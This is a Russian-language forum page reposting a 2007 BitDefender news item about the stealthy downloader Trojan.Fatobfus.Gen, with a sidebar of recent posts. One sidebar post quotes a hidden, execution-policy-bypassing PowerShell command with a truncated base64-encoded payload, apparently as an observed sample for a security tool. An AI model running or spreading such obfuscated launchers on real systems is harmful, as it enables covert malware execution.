Перейти к содержанию
Vorobey1

BitDefender предупреждает...

Recommended Posts

Vorobey1

BitDefender предупреждает об эпидемии

25.01.2007

Лаборатория BitDefender проинформировала о появлении нового трояна, который чрезвычайно быстро распространяется и не обнаруживается другими программными средствами защиты.

Очевидно, троян постоянно "маскируется" и используется для распространения другого вредоносного кода, например, различных версий троянов Swizor или QHost. На момент публикации, BitDefender был единственным программным продуктом, который мог обнаружить все известные в настоящее время версии этого трояна.

"Trojan.Fatobfus.Gen спроектирован таким образом, который позволяет ему избегать обнаружения антивирусами и делает работу вирусных аналитиков максимально тяжелой. Как только троян попадает на компьютер, он скрывает себя в процессе Internet Explorer, где и запускает загрузку и установку другого malware. Даже если бы антивирусные программы и обнаружили некоторые из вирусов, которые этот троян проинсталлировал, они бы не обнаружили непосредственно самого трояна, который продолжал бы загружать вредоносный код", заявил Sorin Dudea, исследователь BitDefender.

Быстрые темпы распространения свидетельствуют, что троян активно "сеется", используя спам-сети, различные уязвимости или зараженные веб-узлы.

"Мы надеемся, что и другие компании в скором времени выпустят свои собственные обновления". http://bakotech.com.ua/readnews/1357.html

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SuperBrat
BitDefender предупреждает об эпидемии

Ссылку на оригинал желательно выкладывать рядом.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×